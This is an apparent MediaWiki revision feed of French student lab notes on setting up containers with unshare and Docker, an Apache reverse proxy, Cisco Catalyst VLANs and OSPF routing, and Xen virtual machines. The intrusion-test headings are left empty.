 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en terminant en '''C0''' plutôt que '''B0'''&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49086</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49086"/>
				<updated>2018-12-21T15:00:33Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Le routage de site (IPv6) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
